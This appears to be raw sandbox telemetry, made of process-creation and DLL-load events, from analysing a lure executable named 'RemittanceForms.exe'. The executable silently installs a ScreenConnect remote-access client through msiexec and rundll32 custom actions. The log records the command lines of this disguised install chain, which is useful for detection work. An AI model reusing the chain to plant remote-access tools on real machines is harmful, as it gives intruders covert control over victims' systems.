Source: C:\Users\user\Downloads\RemittanceForms.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50CA2B6AF1D72CC80C4E11E477922C45 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 12F154F86D29205A07CD9883F3F7AAB3
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID5DB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6346343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: unknown	Process created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
Source: unknown	Process created: C:\Users\user\Downloads\RemittanceForms.exe "C:\Users\user\Downloads\RemittanceForms.exe"
Source: C:\Users\user\Downloads\RemittanceForms.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI20FD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6365687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 658C20DC4570CE36B0E2CFA7882ABE33 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8C89C74C56A8241057E69ABE1029F40F C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C1CF189F56AA756A7464B123F5466459
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d631616b-045d-46ad-b654-67b074b7884f" "User"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\RemittanceForms (1).exe "C:\Users\user\Downloads\RemittanceForms (1).exe"
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1092 --field-trial-handle=1972,i,9532732200185149555,16530467832849214428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\RemittanceForms (1).exe "C:\Users\user\Downloads\RemittanceForms (1).exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85D94624DDB7360BF8B7EA65934AC6CF C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FAAB4D8D67AEAB9EA3FB9C311B04B13B
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8F57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6393796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: amsi.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: edputil.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: slc.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Downloads\RemittanceForms.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll
